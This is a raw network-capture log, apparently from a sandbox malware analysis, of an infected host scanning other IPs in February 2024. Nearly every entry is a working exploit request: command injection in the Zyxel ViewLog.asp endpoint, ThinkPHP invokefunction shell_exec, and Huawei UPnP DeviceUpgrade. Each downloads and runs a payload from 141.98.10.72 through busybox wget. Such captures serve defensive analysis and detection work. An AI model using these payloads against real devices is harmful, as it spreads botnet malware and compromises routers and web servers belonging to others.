                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:48.107928038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            950192.168.2.235395231.136.38.1378080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:06.992742062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:07.665481091 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:09.009428024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:11.761048079 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:17.136156082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:27.886632919 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:50.155860901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            951192.168.2.233589494.122.206.2398080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:07.019555092 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:08.305373907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:09.809184074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:13.040729046 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:19.183995008 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:31.214181900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:56.298870087 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            952192.168.2.233972295.86.105.148080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:07.140965939 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            953192.168.2.234745694.65.33.328080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:07.156138897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            954192.168.2.236085295.86.74.20780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:07.441131115 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            955192.168.2.235910488.221.154.9180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:07.610728025 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:07.770350933 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:30:07 GMT
                                                            Date: Wed, 14 Feb 2024 08:30:07 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 66 34 64 64 62 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 30 37 26 23 34 36 3b 33 62 37 63 65 39 65 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;8f4ddb17&#46;1707899407&#46;3b7ce9e6</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            956192.168.2.234186088.198.134.9780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:07.651396036 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:07.861931086 CET404INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:30:07 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            957192.168.2.2350630197.49.98.16637215
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:10.064640045 CET826OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Feb 14, 2024 09:30:10.340245962 CET182INHTTP/1.1 500 Internal Server Error
                                                            Content-Type: text/xml; charset="utf-8"
                                                            Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                            EXT:
                                                            Connection: Keep-Alive
                                                            Content-Length: 398


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            958192.168.2.234607631.200.99.438080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:10.572736025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            959192.168.2.233409485.105.168.828080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:10.600218058 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            960192.168.2.235361631.136.30.1048080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:11.069417953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:11.761291981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:13.104901075 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:15.856337070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
